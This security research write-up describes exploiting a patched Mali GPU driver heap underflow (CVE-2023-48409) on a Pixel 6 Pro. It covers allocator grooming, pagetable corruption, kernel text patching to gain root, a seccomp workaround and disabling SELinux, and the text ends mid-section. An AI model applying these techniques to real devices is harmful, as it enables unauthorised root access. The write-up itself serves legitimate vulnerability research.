Solo: A Pixel 6 Pro Story (When one bug is all you need)

During my internship I was tasked to analyze a Mali GPU exploit on Pixel 7/8 devices and adapt it to make it work on another device: the Pixel 6 Pro.

While the exploit process itself is relatively straightforward to reproduce (in theory we just need to find the correct symbol offsets and signatures for our target device), what’s interesting about Pixel 6 Pro is that it uses a different Mali GPU from the Pixel 7/8, which lacked support for a feature that one of the two vulnerabilities within the exploit relied on:

But wait, do we actually need both bugs to work?

Root Cause Analysis
One Bug to Root
Android’s Unique Challenges
- Bypassing Android’s App Sandbox
- Disabling SELinux Enforcement
A Surprise Discovery
Conclusion
References

Root Cause Analysis

CVE-2023-48409

Here, we will first be taking a deep dive into the other vulnerability: CVE-2023-48409, which seems to be more readily exploitable. This CVE is covered in the December 2023 Pixel Security Bulletin; referencing the internal Bug ID, we can actually locate the exact patch for our device, verifying that the vulnerability is indeed fixed for December 2023 SPL onwards. As such, we will be rolling back our device version to an earlier patch, UP1A.231005.007 in our case:

raven:/ $ uname -a 
Linux localhost 5.10.157-android13-4-00001-g5c7ff5dc7aac-ab10381520 #1 SMP PREEMPT Fri Jun 23 18:30:49 UTC 2023 aarch64 Toybox
raven:/ $ getprop ro.build.fingerprint
google/raven/raven:14/UP1A.231005.007/10754064:user/release-keys

From the description:

In gpu_pixel_handle_buffer_liveness_update_ioctl of private/google-modules/gpu/mali_kbase/mali_kbase_core_linux.c, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.

The vulnerability is caused by an integer overflow when calculating the size of a kernel object allocated in preparation for an operation (very descriptively, handling a liveness update) within the GPU driver:

int gpu_pixel_handle_buffer_liveness_update_ioctl(struct kbase_context* kctx,
                                                  struct kbase_ioctl_buffer_liveness_update* update)
{
	int err = 0;
	struct gpu_slc_liveness_update_info info;
	u64* buff;

	/* Compute the sizes of the user space arrays that we need to copy */
	u64 const buffer_info_size = sizeof(u64) * update->buffer_count;			// [1]
	u64 const live_ranges_size =
	    sizeof(struct kbase_pixel_gpu_slc_liveness_mark) * update->live_ranges_count;
	/* Nothing to do */
	if (!buffer_info_size || !live_ranges_size)
		goto done;

	/* Guard against nullptr */
	if (!update->live_ranges_address || !update->buffer_va_address || !update->buffer_sizes_address)
		goto done;
	/* Allocate the memory we require to copy from user space */
	buff = kmalloc(buffer_info_size * 2 + live_ranges_size, GFP_KERNEL);			// [2]

	/* Set up the info struct by pointing into the allocation. All 8 byte aligned */
	info = (struct gpu_slc_liveness_update_info){						// [3]
	    .buffer_va = buff,
	    .buffer_sizes = buff + update->buffer_count,
	    .live_ranges = (struct kbase_pixel_gpu_slc_liveness_mark*)(buff + update->buffer_count * 2),
	    .live_ranges_count = update->live_ranges_count,
	};
	/* Copy the data from user space */
	err =
	    copy_from_user(info.live_ranges, u64_to_user_ptr(update->live_ranges_address), live_ranges_size);
	if (err) {
		dev_err(kctx->kbdev->dev, "pixel: failed to copy live ranges");
		err = -EFAULT;
		goto done;									// [4]
	}
    
...

done:
	kfree(buff);
	return err;
}

Specifically, we are able to specify two u64s: buffer_count and live_ranges_count, such that the driver allocates an object via kmalloc(GFP_KERNEL) ([2]), which is supposed to house 3 consecutive buffers, all of which are directly user-controllable ([3]):

buffer_sizes, with size sizeof(u64) * buffer_count
buffer_va, with size sizeof(u64) * buffer_count
live_ranges, with size sizeof(struct kbase_pixel_gpu_slc_liveness_mark) * update->live_ranges_count (the struct is 4 bytes)

Focusing on the live_ranges buffer:

Allocated object size: 8*buffer_count*2 + 4*live_ranges_count ([1] and [2])
Offset from allocated object: + 8*buffer_count*2 ([1] and [3])

In this case, if the values are crafted such that 8*buffer_count*2 + 4*live_ranges_count = (1<<64) + <object_size>, our live_ranges buffer will be located 4*live_ranges_count - <object_size> bytes before the allocated object. And fortunately since live_ranges is written to first, we can cause an invalid memory access midway through the write to abort the whole operation early without writing to the other two buffers (which have very blatantly invalid bounds) ([4]). Thus, we can effectively treat the vulnerability as a pretty versatile primitive: An arbitrary size kmalloc(GFP_KERNEL) paired with an arbitrary length (0x10 byte-aligned) buffer underflow from the allocated object.

While this is really powerful and there seems to be many ways to branch off from here, this vulnerability has two main limitations:

The allocated object is immediately freed after the underflow. On paper this should not be an issue if we only need to underflow once, and we can also try to find another object to “hold” the spot temporarily if we need to.
The write uses copy_from_user, and the underflow is set up in such a way that it actually guarantees to overflow the victim object (into our actual allocated object). In a kernel with CONFIG_HARDENED_USERCOPY enabled, this means we are directly forbidden from corrupting any object in the SLUB allocator.

But first, as a primer:

What is `CONFIG_HARDENED_USERCOPY`?

CONFIG_HARDENED_USERCOPY, introduced here, is a kernel config which first appeared in Linux v4.8. From the Kconfig itself, we have:

This option checks for obviously wrong memory regions when copying memory to/from the kernel (via copy_to_user() and copy_from_user() functions) by rejecting memory ranges that are larger than the specified heap object, span multiple separately allocated pages, are not on the process stack, or are part of the kernel text. This kills entire classes of heap overflow exploits and similar kernel memory exposures.

In essence, during copy_*_user, the kernel makes a call to check_object_size, which performs specific bounds checks to the target pointer if it falls within certain highlighted regions, and aborts (BUG()) if the bounds are violated. In particular, if the pointer is within a SLUB object, it ensures that minimally, the read/write region must fall entirely within the usable region of that particular object (based on the object_size of the cache), rendering most object overflow attacks invalid. Since v4.16, the whitelisted region has been further restricted to just the usercopy region of the object (based on the useroffset and usersize of the cache), though for general purpose caches it is equivalent to the entire object region anyway.

To understand the scale of the impact, we must first understand that most out-of-bounds attacks, at least back when the config was introduced, focus on overwriting or leaking a crucial field in a separate victim object placed right beside the vulnerable object. Most commonly used “techs” in this case are slab allocated objects, especially general purpose ones, due to their flexibility of usage to meet the demand of vulnerabilities commonly found in such surfaces.

Putting it in context, without CONFIG_HARDENED_USERCOPY, our vulnerability in question can be extremely versatile as it has the potential to overwrite almost any object we want due to its flexible size. As an example, we can easily convert our blind write into a leak by utilizing anon_vma_name objects:

Spray anon_vma_name objects, ideally such that we fill an entire slab with them for greater reliability.
Free one of them to create a hole, and allocate the vulnerable object in its place, overwriting the preceding anon_vma_name object such that its char buffer is extended to the following anon_vma_name object.
If we have marked the objects beforehand, we have now found out the ids of both the anon_vma_name objects preceding and following the vulnerable object, effectively overcoming CONFIG_SLAB_FREELIST_RANDOM: the preceding object will have its name extended, while the the id of the following object will appear in the extended name.
Free the following anon_vma_name object and allocate in its place any suitable object (of matching size and type) which we want its first field to be leaked.

In practice, since CONFIG_HARDENED_USERCOPY is enabled by default, trying to execute step 2 above immediately crashes our kernel. This feature completely nips many out-of-bounds vulnerabilities in the bud, while severely limiting potential options for the rest. In our case however, we do still have a way out.

The Missing Piece: CVE-2023-26083

Working with a heavily nerfed write vulnerability, the best bet is to first generate an address leak that we can subsequently manipulate. In the original exploit, this is realized through the second vulnerability, CVE-2023-26083.

Briefly, a stream functionality in the driver (tlstream), freely exposed to userspace processes including unprivileged ones, potentially contains kernel addresses of certain objects as plain bytes. In particular, the exploit identifies kbase_kcpu_command_queue, which:

Can be freely sprayed;
Allows for targeted kfrees; and
Readily leaks its address into the stream.

From the original writeup, the offending function in this case is as follows:

void __kbase_tlstream_tl_kbase_kcpuqueue_enqueue_fence_wait(
	struct kbase_tlstream *stream,
	const void *kcpu_queue,
	const void *fence
)
{
	const u32 msg_id = KBASE_TL_KBASE_KCPUQUEUE_ENQUEUE_FENCE_WAIT;
	const size_t msg_size = sizeof(msg_id) + sizeof(u64)
		+ sizeof(kcpu_queue)
		+ sizeof(fence)
		;
	char *buffer;
	unsigned long acq_flags;
	size_t pos = 0;

	buffer = kbase_tlstream_msgbuf_acquire(stream, msg_size, &acq_flags);

	pos = kbasep_serialize_bytes(buffer, pos, &msg_id, sizeof(msg_id));
	pos = kbasep_serialize_timestamp(buffer, pos);
	pos = kbasep_serialize_bytes(buffer,
		pos, &kcpu_queue, sizeof(kcpu_queue));				// [1]
	pos = kbasep_serialize_bytes(buffer,
		pos, &fence, sizeof(fence));

	kbase_tlstream_msgbuf_release(stream, acq_flags);
}

Note that kbasep_serialize_bytes (at [1]) is nothing but a memcpy into the acquired tlstream buffer:

static inline size_t kbasep_serialize_bytes(
		char       *buffer,
		size_t     pos,
		const void *bytes,
		size_t     len)
{
	KBASE_DEBUG_ASSERT(buffer);
	KBASE_DEBUG_ASSERT(bytes);

	memcpy(&buffer[pos], bytes, len);

	return pos + len;
}

Since a reference to the kernel address is used as the source to memcpy, the address itself gets written into the buffer as bytes, effectively presenting as a free leak.

Now, as mentioned at the beginning, this did not directly work for our device. Trying to reach for a tlstream from the original exploit threw us an -EINVAL, while looking through the source made me realize that the code surrounding kbase_kcpu_command_queue was not even compiled (spoiler!) into our version of the driver in the first place. Hence, we will be setting this vulnerability aside (for now).

One Bug to Root

Going back to our underflow vulnerability: the starting point is that instead of the slab allocator, we will have to target the page allocator directly. While most kernel objects are allocated through the slab allocator, the general purpose caches only cover up to a certain size – kmalloc-8k in most cases, corresponding to order-1 block allocations. Thus, a call to kmalloc(sz, GFP_KERNEL) or similar where sz > 0x2000 results in the kernel delegating the allocation to the page allocator instead, stripping away the protection from CONFIG_HARDENED_USERCOPY, but minimally allocating an order-2 block (0x4000 bytes).

Then, we can directly allocate an order-2 block for our vulnerable object. Unlike the slab allocator which has a further layer of protection namely CONFIG_FREELIST_RANDOM (albeit still relatively easily bypassable), the page allocator works directly with the underlying physical memory, where we can groom the allocator much more effectively to get it to produce two consecutive addresses. (Unfortunately, this is not 100% guaranteed, so there is a chance that one of the pages goes to something else, potentially triggering CONFIG_HARDENED_USERCOPY and crashing the system, presenting a minor annoyance.)

This was what the original exploit made use of as well, where it allocated a pipe_buffer array object with total size greater than the slab allocation threshold, and hijacked its page pointer to acquire unlimited read/write on a single arbitrary address (which can in theory be repeated over and over, but that would be less reliable). Of course, this unfortunately requires a prior leak, previously acquired through the second vulnerability, which we do not have access to in our scenario. Similar exploits like Page UAF wouldn’t work as well, as that requires modifying the first byte of the page pointer, which is not possible with an underflow.

What we first need to achieve is to convert this restricted underflow into some form of address leak. While it is definitely possible to hunt the kernel source for a suitable tech that leaks an address when modified (kcalloc seems like a great starting point), there is actually a more straightforward alternative: why don’t we guess the address instead?

Physmap Spraying

ret2dir was a popular technique abusing the physmap, which, briefly, is a direct 1:1 mapping of the physical memory onto the kernel virtual address space, where any physical address is a direct linear translation (offset being the start address of the region) of a certain virtual address.

Here, we are more concerned with the “spraying” portion: we know that physical memory is limited, and that the page allocator is relatively predictable in the regions of memory it will allocate from. We can perhaps exhaust the page allocator with some sprayable victim object in order to maximize the chances of the object being allocated at our chosen address (our “educated guess”), as outlined in the original paper.

We will however have to figure out a desirable address ourselves. To do so, we can hack up a dummy driver to force the kernel to allocate as many pages as possible, and figure out where the allocations are made.

void *spray_head = NULL; // linked list for batch free upon exit
static long dummy_ioctl(struct file *file, unsigned int cmd, unsigned long arg) {
	struct dummy_ioctl_struct data = { .addr = 0 };
	switch (cmd) {
	case DUMMY_IOCTL_SPRAY_ONE:
		void *tmp = (void *)__get_free_pages(GFP_KERNEL, 0);
		if (tmp) {
			*(void **)tmp = spray_head;
			spray_head = tmp;
			data.addr = tmp;
		}
		if (copy_to_user((void __user *)arg, &data, sizeof(data))) {
			return -EFAULT;
		}
		break;
	default:
		return -EINVAL;
	}
	return 0;
}

As an example, here’s a graph of 1,500,000 single page allocations across multiple runs:

It should be noted that the entropy of the starting address from device reboots is insignificant compared to the range of addresses we are spraying, hence it is not a concern as well:

By picking an address that consistently appears across runs, we have effectively emulated an address leak, where we can for example subsequently overwrite a pipe_buffer page pointer to point to that address for a read/write on that page.

Now comes the choice of our spray object. Unfortunately, we cannot spray pipe_buffer directly to gain full control over one, due to the system limitation on the maximum number of pages a user can allocate for pipes: /proc/sys/fs/pipe-user-pages-soft, set to 16384 (0x4000) in our case, i.e. 0xa0000 bytes worth of pipe_buffers.

Pagetable Spraying

At this point, my mentor introduced me to a useful technique: Dirty Pagetable by @ptrYudai. Essentially, this technique relies on the fact that the pagetables themselves (the last level of structure which helps to map a virtual address to a physical address) are allocated by the page allocator as an ordinary order-0 block, and with a write primitive, we can modify one of its entries to make an mmap-ed userland virtual page reflect almost any arbitrary physical page.

This has a similar effect to pipe_buffer, but it concerns physical addresses directly. A crucial difference however is that it is much more sprayable: while a limit still exists (vm.max_map_count = 65530), this is a per-process limit, so we can easily fork a bunch of processes to spray more pagetables. We can also optimize for the number of pagetable objects sprayed in each process by allocating just 1 page in each pagetable.

/*
 * (in PGD)   (in PUD)   (in PMD)   (in PTE)      (in page)
 *   PUD#       PMD#       PTE#      PAGE#         OFFSET
 * 4444 4333 3333 3322 2222 2221 1111 1111 0000 0000 0000
 * 0000 0000 0000 0100 0000 0000 0000 0000 0000 0000 0000 base addr
 * 0000 0000 0000 0100 0000 1001 1111 1111 0000 0000 0000 sample spray (idx 4)
 */

#define BASE_ADDR (1UL<<(12+9+9))
#define PAGE_ADDR(x) ((BASE_ADDR)+((uint64_t)(x)<<(12+9)) | 511UL<<12)

static inline int mmap_page(uint64_t page_idx) {
	if (mmap((void *)PAGE_ADDR(page_idx), 0x1000,
		PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED,
		-1, 0) == (void *)-1) return -1;
	return 0;
}

There is a caveat to this method: in order to actually allocate the pagetable object, we will have to cause a fault by accessing / writing to its page, allocating the actual mmap page (also of order-0 of course) in the process. This mmap page itself undesirably competes with the pagetable object to be allocated at our target address. The silver lining however is that they are of a different migrate type in the page allocator:

static inline struct page *
alloc_zeroed_user_highpage_movable(struct vm_area_struct *vma,
				   unsigned long vaddr)
{
	struct page *page = alloc_page_vma(GFP_HIGHUSER_MOVABLE | __GFP_CMA, vma, vaddr);
	if (page)
		clear_user_highpage(page, vaddr);
	return page;
}

Each migrate type (movable vs unmovable in this case) has their corresponding pageblocks, of order pageblock_order (which has the value of 10 on our device according to /proc/pagetypeinfo), which pages will be allocated from. Since the two types of pages (mmap pages and pagetable pages) are linearly allocated together, our pagetables will end up in either the pageblock housing our chosen address or the pageblock directly after it (2**10 = 0x400000 bytes apart in our case). That is to say, we will have to check both addresses in order to reliably find a pagetable.

That aside, by spraying the pagetables, we also manage to more or less exhaust the order-2 freelist and groom the page allocator to quite reliably provide consecutive order-2 blocks subsequently, allowing us to then trigger the vulnerability easily. Instead of corrupting pipe_buffer, we can also opt to overwrite some pagetable objects themselves, as this nets us greater control over the entire page. But since they are of a different order (order-0), a bit more setup is required:

Allocate 2 pipe_buffer arrays of order-2, which should be consecutive in memory.
Free the first pipe_buffer array (via close), and spray a few more pagetable objects to force the page allocator to split up and allocate on that pipe_buffer order-2 block.
Free the second pipe_buffer array, and allocate the malicious object to trigger the underflow, overwriting the pagetable entries before the object.
By overwriting to our chosen physical address, one of our freshly mmap-ed pages should now reflect an actual pagetable object in memory (our “puppet” pagetable).

Side note: most likely due to how our puppet pagetable gets treated as an mmap-ed page, we will need to choose a different target address across independent exploit runs, but this is a small issue as we can simply choose the next available page next time (by adding 0x1000 to our previous target addresses).

Then, we can identify our puppet page by nudging its exposed pagetable entry to some other address and iterating through all the previously sprayed pages to check which one has their memory altered. The current setup is as illustrated below, which we can then manipulate to achieve arbitrary physical address read/write:

(Green cells represent pages accessible from userspace)

Note that sometimes overwriting the pagetable entry does not immediately reflect in the puppet page due to TLB caching. We can choose to either just wait for a short duration or force a flush by calling mprotect (and then resetting the entry flags as needed).

From Physical to Virtual: Converting Our Primitive

Funnily, we still do not have a proper leak yet. Attempting to munmap the associated page does not immediately free the pagetable, but instead queues it via RCU:

static void __tlb_remove_table_free(struct mmu_table_batch *batch)
{
	int i;
	for (i = 0; i < batch->nr; i++)
		__tlb_remove_table(batch->tables[i]);
	free_page((unsigned long)batch);
}

...

static void tlb_remove_table_rcu(struct rcu_head *head)
{
	__tlb_remove_table_free(container_of(head, struct mmu_table_batch, rcu));
}

static void tlb_remove_table_free(struct mmu_table_batch *batch)
{
	call_rcu(&batch->rcu, tlb_remove_table_rcu);
}

Since we cannot reliably free the pagetable, we do not get to replace it with another useful object. One workaround is to sprinkle in the useful objects during the pagetable spray, such that we can search the neighborhood of our exposed pagetable to reach it. Of course in this case we can use pipe_buffer again, leaking a kernel text pointer as well as gaining arbitrary read/write on virtual addresses. From there, we can perform our standard kernel modifications to get root.

Android’s Unique Challenges

My mentor later pointed out that for Pixel devices, the physical address of the kernel image is actually fixed:

raven:/ # cat /proc/iomem | grep -i kernel
  80000000-82c8ffff : Kernel code
  82f00000-831cffff : Kernel data

(It was also noted a few years ago here that AArch64 in general did not directly implement physical KASLR.)

This means we can actually point our pagetable entry directly to a kernel text page, without separately needing to leak or guess an address. Hence we do not have to perform physmap spray anymore, which improves our exploit reliability. Granted, we still have to groom the heap somewhat in order to align the order-0 pagetable object and our order-2 malicious object. In addition, changing our write address iteratively is still possible (by repeatedly triggering the bug) but not as reliable; it is more reliable to corrupt multiple pagetables (since up to 4 can fit within an order-2 block) at once.

Since we are accessing the physical page of the kernel, we are also not bounded by the permissions set on the virtual addresses, allowing us to directly access and modify them from userspace. This is similar in spirit to the USMA attack, but again in this case we are able to bypass the need for an address leak.

Then, similar to the USMA attack highlighted above, we can opt to overwrite the check in __sys_setuid:

long __sys_setuid(uid_t uid)
{
...
	retval = -EPERM;
	if (ns_capable_setid(old->user_ns, CAP_SETUID)) { // TO BYPASS
		new->suid = new->uid = kuid;
		if (!uid_eq(kuid, old->uid)) {
			retval = set_user(new);
			if (retval < 0)
				goto error;
		}
	} else if (!uid_eq(kuid, old->uid) && !uid_eq(kuid, new->suid)) {
		goto error;
	}
    
	new->fsuid = new->euid = kuid;
...
}

This method has two small issues:

The underlying code may be unpredictable across different kernel builds.
This only allows us to modify our uid; we will need a separate page for gid.

An alternative is to delve into the underlying code of ns_capable_setid, which both __sys_setuid and __sys_setgid use.

static bool ns_capable_common(struct user_namespace *ns,
			      int cap,
			      unsigned int opts)
{
	int capable;
	if (unlikely(!cap_valid(cap))) {
		pr_crit("capable() called with invalid cap=%u\n", cap);
		BUG();
	}
	capable = security_capable(current_cred(), ns, cap, opts);
	if (capable == 0) {
		current->flags |= PF_SUPERPRIV;
		return true;
	}
	return false;
}

...

bool ns_capable_setid(struct user_namespace *ns, int cap)
{
	return ns_capable_common(ns, cap, CAP_OPT_INSETID);
}
EXPORT_SYMBOL(ns_capable_setid);

The referred security check can be found within security/security.c:

#define call_int_hook(FUNC, IRC, ...) ({			\
	int RC = IRC;						\
	do {							\
		struct security_hook_list *P;			\
								\
		hlist_for_each_entry(P, &security_hook_heads.FUNC, list) { \
			RC = P->hook.FUNC(__VA_ARGS__);		\
			if (RC != 0)				\
				break;				\
		}						\
	} while (0);						\
	RC;							\
})

...

int security_capable(const struct cred *cred,
		     struct user_namespace *ns,
		     int cap,
		     unsigned int opts)
{
	return call_int_hook(capable, 0, cred, ns, cap, opts);
}

Notably, the kernel iterates through the capable entry in security_hook_heads, which is represented as a linked list (hlist in this case) of hook functions, and passes (returns 0) if every function in the linked list pass their corresponding checks.

#define hlist_for_each_entry(pos, head, member)				\
	for (pos = hlist_entry_safe((head)->first, typeof(*(pos)), member);\
	     pos;							\
	     pos = hlist_entry_safe((pos)->member.next, typeof(*(pos)), member))

Thus, if we clear out security_hook_heads.capable (which is just a pointer to the first hlist_node), we skip the iteration entirely, passing the whole check by default. Now this allows us to call setuid(0) directly and achieve root.

Note that security_hook_heads is marked __ro_after_init, so we can really only modify it via a kernel text write, at which point anything is already possible. This method helps to streamline the root process and removes a lot of guesswork and kernel-specific implementation.

Bypassing Android’s App Sandbox

In the Termux environment however, things are not that simple – when we attempt to call setuid(0), our program immediately crashes with SIGSYS: Bad system call. This is due to the seccomp filter inherently enabled on all applications. We can see this in effect when we try to run an empty binary with just a setuid syscall:

05-20 13:42:21.366 12094 12094 I crash_dump64: obtaining output fd from tombstoned, type: kDebuggerdTombstoneProto         
05-20 13:42:21.366   596   596 I tombstoned: received crash request for pid 12091                                           
05-20 13:42:21.366 12094 12094 I crash_dump64: performing dump of process 12091 (target tid = 12091)                        
05-20 13:42:21.369 12094 12094 F DEBUG   : *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***                  
05-20 13:42:21.369 12094 12094 F DEBUG   : Build fingerprint: 'google/raven/raven:14/UP1A.231005.007/10754064:user/release-keys'
05-20 13:42:21.369 12094 12094 F DEBUG   : Revision: 'MP1.0'
05-20 13:42:21.369 12094 12094 F DEBUG   : ABI: 'arm64'                                                                    
05-20 13:42:21.369 12094 12094 F DEBUG   : Timestamp: 2025-05-20 13:42:21.367252620+0800                                   
05-20 13:42:21.369 12094 12094 F DEBUG   : Process uptime: 1s                                                               
05-20 13:42:21.369 12094 12094 F DEBUG   : Cmdline: ./xpl                                                                  
05-20 13:42:21.369 12094 12094 F DEBUG   : pid: 12091, tid: 12091, name: xpl  >>> ./xpl <<<
05-20 13:42:21.369 12094 12094 F DEBUG   : uid: 10266                                                                      
05-20 13:42:21.369 12094 12094 F DEBUG   : tagged_addr_ctrl: 0000000000000001 (PR_TAGGED_ADDR_ENABLE)                      
05-20 13:42:21.369 12094 12094 F DEBUG   : signal 31 (SIGSYS), code 1 (SYS_SECCOMP), fault addr --------                    
05-20 13:42:21.369 12094 12094 F DEBUG   : Cause: seccomp prevented call to disallowed arm64 system call 146      
05-20 13:42:21.369 12094 12094 F DEBUG   :     x0  0000000000000000  x1  0000007fc763ba38  x2  0000007fc763ba48  x3  0000007fc763b9f0
05-20 13:42:21.369 12094 12094 F DEBUG   :     x4  00000074d5b4e0c0  x5  0000000001414d4c  x6  0000000001414d4c  x7  00000074d5b4e004
05-20 13:42:21.369 12094 12094 F DEBUG   :     x8  0000000000000092  x9  020bdbd74cb253c0  x10 0000000000000000  x11 0000000000000000
05-20 13:42:21.369 12094 12094 F DEBUG   :     x12 0000000000000000  x13 0000000000000000  x14 0000000000000001  x15 0000000000000008
05-20 13:42:21.369 12094 12094 F DEBUG   :     x16 00000055f5c07ed8  x17 00000074d2346570  x18 00000074d6906000  x19 00000055f5c06a84
05-20 13:42:21.369 12094 12094 F DEBUG   :     x20 0000007fc763ba48  x21 0000000000000001  x22 0000007fc763ba38  x23 0000000000000000
05-20 13:42:21.369 12094 12094 F DEBUG   :     x24 0000000000000000  x25 0000000000000000  x26 0000000000000000  x27 0000000000000000
05-20 13:42:21.369 12094 12094 F DEBUG   :     x28 0000000000000000  x29 0000007fc763b9b0                                  
05-20 13:42:21.369 12094 12094 F DEBUG   :     lr  00000055f5c06aac  sp  0000007fc763b940  pc  00000074d2346578  pst 0000000060001000
05-20 13:42:21.369 12094 12094 F DEBUG   : 3 total frames   
05-20 13:42:21.369 12094 12094 F DEBUG   : backtrace:                                                                      
05-20 13:42:21.369 12094 12094 F DEBUG   :       #00 pc 00000000000b4578  /apex/com.android.runtime/lib64/bionic/libc.so (setuid+8) (BuildId: 19c32900d9d702c303d2b4164fbba76c)
05-20 13:42:21.369 12094 12094 F DEBUG   :       #01 pc 0000000000003aa8  /data/data/com.termux/files/home/xpl (main+36)   
05-20 13:42:21.369 12094 12094 F DEBUG   :       #02 pc 00000000000546e8  /apex/com.android.runtime/lib64/bionic/libc.so (__libc_init+104) (BuildId: 19c32900d9d702c303d2b4164fbba76c)

The official blogpost above mentioned that only 17 syscalls are blocked by default. We can consult the list of blocked syscalls in libc/SECCOMP_BLOCKLIST_*.TXT of the bionic library source code.

# syscalls to modify IDs
int     setgid:setgid32(gid_t)     lp32
int     setgid:setgid(gid_t)       lp64
int     setuid:setuid32(uid_t)    lp32
int     setuid:setuid(uid_t)      lp64
int     setregid:setregid32(gid_t, gid_t)  lp32
int     setregid:setregid(gid_t, gid_t)    lp64
int     setreuid:setreuid32(uid_t, uid_t)   lp32
int     setreuid:setreuid(uid_t, uid_t)     lp64
int     setresgid:setresgid32(gid_t, gid_t, gid_t)   lp32
int     setresgid:setresgid(gid_t, gid_t, gid_t)     lp64
# setresuid is explicitly allowed, see above.
int     setfsgid:setfsgid32(gid_t) lp32
int     setfsgid:setfsgid(gid_t)   lp64
int     setfsuid:setfsuid32(uid_t) lp32
int     setfsuid:setfsuid(uid_t)   lp64
int     setgroups:setgroups32(int, const gid_t*)   lp32
int     setgroups:setgroups(int, const gid_t*)     lp64

Funnily, setresuid is explicitly allowed – we can quickly swap setuid(0) with setresuid(0, 0, 0) and verify that it actually works. However, all set*gid syscalls are blocked, which is not exactly crucial, i.e. we could realistically just ignore it. Though if really required, one simple workaround is to patch an allowed syscall (e.g. getuid) to route to setuid(0) and setgid(0), since we have arbitrary write on the kernel anyway.

Disabling SELinux Enforcement

Finally, we have to bypass SELinux as well, since we are in an Android environment. This is also relatively straightforward once we have an arbitrary kernel write, where we clear the selinux_state.enforcing bit to disable SELinux entirely.

struct selinux_state {
#ifdef CONFIG_SECURITY_SELINUX_DISABLE
	bool disabled;
#endif
#ifdef CONFIG_SECURITY_SELINUX_DEVELOP
	bool enforcing;
#endif
	bool checkreqprot;
	bool initialized;
	bool policycap[__POLICYDB_CAPABILITY_MAX];
	bool android_netlink_route;
	bool android_netlink_getneigh;
	struct page *status_page;
	struct mutex status_lock;
	struct selinux_avc *avc;
	struct selinux_policy __rcu *policy;
	struct mutex policy_mutex;
} __randomize_layout;

A Surprise Discovery

While writing for the above vulnerability, I wanted to take a closer look at how the other vulnerability, CVE-2023-26083, actually worked and to fully understand exactly why it was mentioned it did not work on Pixel 6 Pro, so I could elaborate on it in the introduction better. Little did I know, things did not turn out that simple – but in a good way.

Understanding the Timeline Stream Leak

As mentioned in the introduction, the Mali GPU driver provides a feature known as the Timeline Stream (or tlstream), which essentially acts as an event logger. It provides tracepoints via which relevant functions in the driver can log information, alongside the current timestamp, to the stream as events, primarily to aid with performance profiling. While exposing the events may be harmless by itself, they crucially also contain information on some of the variables within the calling functions, including pointers within the kernel (which point to GPU-related objects). This stream is directly exposed to userspace via a file descriptor freely acquirable on demand from the driver, including unprivileged processes as well, allowing access to a free kernel pointer leak.

An attempt to patch this vulnerability was first introduced to Google’s Mali codebase back in March 2023 (the month the CVE was issued), and made its way into the July 2023 SPL. This patch adds a permission check timeline_is_permitted which is invoked when the process attempts to acquire a file descriptor (e.g. by calling kbase_timeline_io_acquire):

@@ -1,7 +1,7 @@
 // SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note
 /*
  *
- * (C) COPYRIGHT 2019-2022 ARM Limited. All rights reserved.
+ * (C) COPYRIGHT 2019-2023 ARM Limited. All rights reserved.
  *
  * This program is free software and is provided to you under the terms of the
  * GNU General Public License version 2 as published by the Free Software
@@ -30,6 +30,64 @@
 #include <linux/version_compat_defs.h>
 #include <linux/anon_inodes.h>
 
+/* Explicitly include epoll header for old kernels. Not required from 4.16. */
+#if KERNEL_VERSION(4, 16, 0) > LINUX_VERSION_CODE
+#include <uapi/linux/eventpoll.h>
+#endif
+
+#ifndef MALI_STRIP_KBASE_DEVELOPMENT
+/* Development builds need to test instrumentation and enable unprivileged
+ * processes to acquire timeline streams, in order to avoid complications
+ * with configurations across multiple platforms and systems.
+ *
+ * Release builds, instead, shall deny access to unprivileged processes
+ * because there are no use cases where they are allowed to acquire timeline
+ * streams, unless they're given special permissions by a privileged process.
+ */
+static int kbase_unprivileged_global_profiling = 1;
+#else
+static int kbase_unprivileged_global_profiling;
+#endif
+
+/**
+ * kbase_unprivileged_global_profiling_set - set permissions for unprivileged processes
+ *
+ * @val: String containing value to set. Only strings representing positive
+ *       integers are accepted as valid; any non-positive integer (including 0)
+ *       is rejected.
+ * @kp: Module parameter associated with this method.
+ *
+ * This method can only be used to enable permissions for unprivileged processes,
+ * if they are disabled: for this reason, the only values which are accepted are
+ * strings representing positive integers. Since it's impossible to disable
+ * permissions once they're set, any integer which is non-positive is rejected,
+ * including 0.
+ *
+ * Return: 0 if success, otherwise error code.
+ */
+static int kbase_unprivileged_global_profiling_set(const char *val, const struct kernel_param *kp)
+{
+	int new_val;
+	int ret = kstrtoint(val, 0, &new_val);
+
+	if (ret == 0) {
+		if (new_val < 1)
+			return -EINVAL;
+
+		kbase_unprivileged_global_profiling = 1;
+	}
+
+	return ret;
+}
+
+static const struct kernel_param_ops kbase_global_unprivileged_profiling_ops = {
+	.get = param_get_int,
+	.set = kbase_unprivileged_global_profiling_set,
+};
+
+module_param_cb(kbase_unprivileged_global_profiling, &kbase_global_unprivileged_profiling_ops,
+		&kbase_unprivileged_global_profiling, 0600);
+
 /* The timeline stream file operations functions. */
 static ssize_t kbasep_timeline_io_read(struct file *filp, char __user *buffer,
 				       size_t size, loff_t *f_pos);
@@ -38,6 +96,15 @@
 static int kbasep_timeline_io_fsync(struct file *filp, loff_t start, loff_t end,
 				    int datasync);
 
+static bool timeline_is_permitted(void)
+{
+#if KERNEL_VERSION(5, 8, 0) <= LINUX_VERSION_CODE
+	return kbase_unprivileged_global_profiling || perfmon_capable();
+#else
+	return kbase_unprivileged_global_profiling || capable(CAP_SYS_ADMIN);
+#endif
+}
+
 /**
  * kbasep_timeline_io_packet_pending - check timeline streams for pending
  *    
@@ -321,6 +388,9 @@
 	};
 	int err;
 
+	if (!timeline_is_permitted())
+		return -EPERM;
+
 	if (WARN_ON(!kbdev) || (flags & ~BASE_TLSTREAM_FLAGS_MASK))
 		return -EINVAL;
 
@@ -364,7 +434,7 @@
 	if (WARN_ON(!kbdev) || WARN_ON(IS_ERR_OR_NULL(kbdev->mali_debugfs_directory)))
 		return;
 
-	file = debugfs_create_file("tlstream", 0444, kbdev->mali_debugfs_directory, kbdev,
+	file = debugfs_create_file("tlstream", 0400, kbdev->mali_debugfs_directory, kbdev,
 				   &kbasep_tlstream_debugfs_fops);
 
 	if (IS_ERR_OR_NULL(file))

This was mentioned in the commit message as well:

